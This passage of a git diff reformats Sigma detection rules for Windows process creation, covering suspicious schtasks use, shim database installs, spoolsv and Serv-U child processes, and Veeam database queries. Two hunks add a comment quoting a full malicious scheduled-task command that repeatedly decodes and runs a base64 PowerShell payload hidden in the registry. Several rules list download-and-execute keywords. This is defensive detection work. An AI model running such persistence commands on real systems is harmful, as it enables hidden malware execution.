(Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -23,22 +22,23 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' - HKEY_ filter_main_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml index df7332bd6..41ac2e2f2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml @@ -1,12 +1,10 @@ title: Scheduled Task Executing Encoded Payload from Registry id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 status: test -description: Detects the creation of a schtask that potentially executes a base64 - encoded payload stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), - Nasreddine Bencherchali (Nextron Systems) +author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022/02/12 modified: 2023/02/04 tags: @@ -22,20 +20,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml index 9a69780b4..2cfa01a27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Types id: 24c8392b-aa3c-46b7-a545-43f71657fe98 related: - - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a - type: similar + - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a + type: similar status: test -description: Detects scheduled task creations or modification on a suspicious schedule - type +description: Detects scheduled task creations or modification on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -23,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' filter_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml index 62d6a09e3..b7d8aa92a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Type With High Privileges id: 7a02e22e-b885-4404-b38b-1ddc7e65258a related: - - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 - type: similar + - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 + type: similar status: test -description: Detects scheduled task creations or modification to be run with high - privileges on a suspicious schedule type +description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -22,22 +21,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' selection_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_*) falsepositives: - - Some installers were seen using this method of creation unfortunately. Filter - them in your environment + - Some installers were seen using this method of creation unfortunately. Filter them in your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml index 029652146..4bc420ae8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml @@ -1,9 +1,7 @@ title: Suspicious Scheduled Task Creation via Masqueraded XML File id: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c status: experimental -description: Detects the creation of a scheduled task using the "-XML" flag with a - file without the '.xml' extension. This behavior could be indicative of potential - defense evasion attempt during persistence +description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence references: - https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml- - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml @@ -22,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: + CommandLine|contains: - /create - -create selection_cli_xml: - CommandLine|contains: + CommandLine|contains: - /xml - -xml filter_main_extension_xml: - CommandLine|contains: .xml + CommandLine|contains: .xml filter_main_system_process: MandatoryLabel: S-1-16-16384 filter_main_rundll32: @@ -43,13 +41,13 @@ detection: ParentProcessName|endswith: \rundll32.exe filter_optional_third_party: ParentProcessName|endswith: + # Consider removing any tools that you don't use to avoid blind spots - :\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe - :\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe - :\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe - :\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe - :\Program Files\Dell\SupportAssist\pcdrcui.exe - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml index 1126b2db2..cf9fc8c31 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml @@ -1,8 +1,7 @@ title: Suspicious Command Patterns In Scheduled Task Creation id: f2c64357-b1d2-41b7-849f-34d2682c0fad status: experimental -description: Detects scheduled task creation using "schtasks" that contain potentially - suspicious or uncommon commands +description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands references: - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ - https://twitter.com/RedDrip7/status/1506480588827467785 @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_schtasks: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe selection_pattern_1: - CommandLine|contains: + CommandLine|contains: - '/sc minute ' - '/ru system ' selection_pattern_2: - CommandLine|contains: + CommandLine|contains: - cmd /c - cmd /k - cmd /r @@ -36,7 +35,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_uncommon: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -enc ' - ' -w hidden ' @@ -45,26 +44,24 @@ detection: - .DownloadData - .DownloadFile - .DownloadString - - '/c start /min ' + - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785 - FromBase64String - mshta http - mshta.exe http selection_anomaly_1: - CommandLine|contains: + CommandLine|contains: - :\Windows\Temp\ - \AppData\ - '%AppData%' - '%Temp%' - '%tmp%' selection_anomaly_2: - CommandLine|contains: + CommandLine|contains: - cscript - curl - wscript - condition: process_creation and (selection_schtasks and ( all of selection_pattern_* - or selection_uncommon or all of selection_anomaly_* )) + condition: process_creation and (selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks are expected to generate some false positives + - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml index d6655a512..332cabb63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml @@ -1,8 +1,7 @@ title: Schtasks Creation Or Modification With SYSTEM Privileges id: 89ca78fd-b37c-4310-b3d3-81a023f83936 status: experimental -description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" - privileges +description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges references: - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -21,23 +20,28 @@ detection: EventID: 4688 Channel: Security selection_root: - CommandLine|contains: + CommandLine|contains: - ' /change ' - ' /create ' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe selection_run: - CommandLine|contains: '/ru ' + CommandLine|contains: '/ru ' selection_user: - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter_optional_teamviewer: - CommandLine|contains|all: + # FP from test set in SIGMA + # Cannot use ParentImage on all OSes for 4688 events + # ParentImage|contains|all: + # - '\AppData\Local\Temp\' + # - 'TeamViewer_.exe' + CommandLine|contains|all: - /TN TVInstallRestore - \TeamViewer_.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR ' - :\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe - /VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST diff --git a/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml index 48d0d23e0..ff478ea52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml @@ -20,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \scrcons.exe - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \dllhost.exe - \powershell.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml index 15f228aac..acbd614e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml @@ -1,15 +1,12 @@ title: Potential Shim Database Persistence via Sdbinst.EXE id: 517490a7-115a-48c6-8862-1a481504d5a8 related: - - id: 18ee686c-38a3-4f65-9f44-48a077141f42 - type: similar + - id: 18ee686c-38a3-4f65-9f44-48a077141f42 + type: similar status: test -description: 'Detects installation of a new shim using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a new shim using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence author: Markus Neis @@ -27,12 +24,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - NewProcessName|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe selection_cli: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_optional_iis: - CommandLine|contains: + CommandLine|contains: + # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) - :\Program Files (x86)\IIS Express\iisexpressshim.sdb - :\Program Files\IIS Express\iisexpressshim.sdb ParentProcessName|endswith: \msiexec.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml b/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml index dcbd6f9c5..331484bc3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml @@ -1,16 +1,12 @@ title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE id: 18ee686c-38a3-4f65-9f44-48a077141f42 related: - - id: 517490a7-115a-48c6-8862-1a481504d5a8 - type: derived + - id: 517490a7-115a-48c6-8862-1a481504d5a8 + type: derived status: test -description: 'Detects installation of a potentially suspicious new shim with an uncommon - extension using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md @@ -29,21 +25,22 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - NewProcessName|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe filter_main_legit_ext: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_main_svchost: - - CommandLine|endswith: - - ' -c' - - ' -f' - - ' -mm' - - ' -t' - - CommandLine|contains: ' -m -bg' + # ParentImage|endswith: ':\Windows\System32\svchost.exe' + - CommandLine|endswith: + - ' -c' + - ' -f' + - ' -mm' + - ' -t' + - CommandLine|contains: ' -m -bg' filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml index c80053738..e00bd37d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml @@ -1,8 +1,7 @@ title: Sdclt Child Processes id: da2738f2-fadb-4394-afa7-0a0674885afa status: test -description: A General detection for sdclt spawning new processes. This could be an - indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml b/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml index 7c895dda0..cf87dfa3c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml @@ -1,8 +1,7 @@ title: Sdiagnhost Calling Suspicious Child Process id: f3d39c45-de1a-4486-a687-ab126124f744 status: test -description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used - in exploits for Follina / CVE-2022-30190) +description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -24,7 +23,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \sdiagnhost.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious LOLBins - \powershell.exe - \pwsh.exe - \cmd.exe @@ -34,7 +34,8 @@ detection: - \taskkill.exe - \regsvr32.exe - \rundll32.exe - - \calc.exe + # - '\csc.exe' # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ + - \calc.exe # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml b/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml index 61f83831e..093c8b1e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml @@ -1,8 +1,7 @@ title: Potential Suspicious Activity Using SeCEdit id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb status: test -description: Detects potential suspicious behaviour using secedit.exe. Such as exporting - or modifying the security policy +description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy references: - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit @@ -37,16 +36,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \secedit.exe - - OriginalFileName: SeCEdit + - NewProcessName|endswith: \secedit.exe + - OriginalFileName: SeCEdit selection_flags_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - /export - /cfg selection_flags_configure: - CommandLine|contains|all: + CommandLine|contains|all: - /configure - /db + # filter: + # SubjectUserName|endswith: '$' SubjectUserName is from event ID 4719 in the Windows Security log condition: process_creation and (selection_img and (1 of selection_flags_*)) falsepositives: - Legitimate administrative use diff --git a/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml index 51cbe391c..9a6389f9c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Serv-U Process Pattern id: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf status: test -description: Detects a suspicious process pattern which could be a sign of an exploited - Serv-U service +description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Serv-U.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe @@ -31,7 +30,7 @@ detection: - \bash.exe - \schtasks.exe - \regsvr32.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \mshta.exe - \rundll32.exe - \msiexec.exe @@ -39,7 +38,6 @@ detection: - \scriptrunner.exe condition: process_creation and selection falsepositives: - - Legitimate uses in which users or programs use the SSH service of Serv-U for - remote command execution + - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml index 24eb5f215..41890e83f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: \setspn.exe - - OriginalFileName: setspn.exe - - Description|contains|all: - - Query or reset the computer - - SPN attribute + - NewProcessName|endswith: \setspn.exe + - OriginalFileName: setspn.exe + - Description|contains|all: + - Query or reset the computer + - SPN attribute selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -q ' - ' /q ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml b/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml index 9cc897388..9e18aa185 100644 --- a/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - '/r ' - '/s ' - NewProcessName|endswith: \shutdown.exe + NewProcessName|endswith: \shutdown.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml b/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml index 713a9c4ee..b165a4f10 100644 --- a/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml +++ b/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /l - NewProcessName|endswith: \shutdown.exe + CommandLine|contains: /l + NewProcessName|endswith: \shutdown.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml index dfa4afa78..b5c83d404 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Uncommon Child Processes Of SndVol.exe id: ba42babc-0666-4393-a4f7-ceaf5a69191e status: experimental -description: Detects potentially uncommon child processes of SndVol.exe (the Windows - volume mixer) +description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) references: - https://twitter.com/Max_Mal_/status/1661322732456353792 author: X__Junior (Nextron Systems) @@ -19,8 +18,8 @@ detection: selection: ParentProcessName|endswith: \SndVol.exe filter_main_rundll32: - CommandLine|contains: ' shell32.dll,Control_RunDLL ' - NewProcessName|endswith: \rundll32.exe + CommandLine|contains: ' shell32.dll,Control_RunDLL ' + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml b/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml index 0794a46cb..c8f6da4f4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /FILE - NewProcessName|endswith: \SoundRecorder.exe + CommandLine|contains: /FILE + NewProcessName|endswith: \SoundRecorder.exe condition: process_creation and selection falsepositives: - Legitimate audio capture by legitimate user. diff --git a/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml index 0dae16cfb..b938f9591 100644 --- a/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: splwow64.exe - NewProcessName|endswith: \splwow64.exe + CommandLine|endswith: splwow64.exe + NewProcessName|endswith: \splwow64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml index a2ee2918a..af3685bfd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml @@ -23,7 +23,7 @@ detection: ParentProcessName|endswith: \spoolsv.exe MandatoryLabel: S-1-16-16384 suspicious_unrestricted: - NewProcessName|endswith: + NewProcessName|endswith: - \gpupdate.exe - \whoami.exe - \nltest.exe @@ -48,39 +48,36 @@ detection: - \reg.exe - \query.exe suspicious_net: - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe suspicious_net_filter: - CommandLine|contains: start + CommandLine|contains: start suspicious_cmd: - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe suspicious_cmd_filter: - CommandLine|contains: + CommandLine|contains: - .spl - route add - program files suspicious_netsh: - NewProcessName|endswith: \netsh.exe + NewProcessName|endswith: \netsh.exe suspicious_netsh_filter: - CommandLine|contains: + CommandLine|contains: - add portopening - rule name suspicious_powershell: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe suspicious_powershell_filter: - CommandLine|contains: .spl + CommandLine|contains: .spl suspicious_rundll32_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE suspicious_rundll32_cli: - CommandLine|endswith: rundll32.exe - condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net - and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) - or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell - and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) + CommandLine|endswith: rundll32.exe + condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) fields: - NewProcessName - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml index 22c993443..292358461 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml @@ -1,8 +1,7 @@ title: Veeam Backup Database Suspicious Query id: 696bfb54-227e-4602-ac5b-30d9d2053312 status: experimental -description: Detects potentially suspicious SQL queries using SQLCmd targeting the - Veeam backup databases in order to steal information. +description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_sql: - CommandLine|contains|all: + CommandLine|contains|all: - VeeamBackup - 'From ' - NewProcessName|endswith: \sqlcmd.exe + NewProcessName|endswith: \sqlcmd.exe selection_db: - CommandLine|contains: + CommandLine|contains: - BackupRepositories - Backups - Credentials diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml 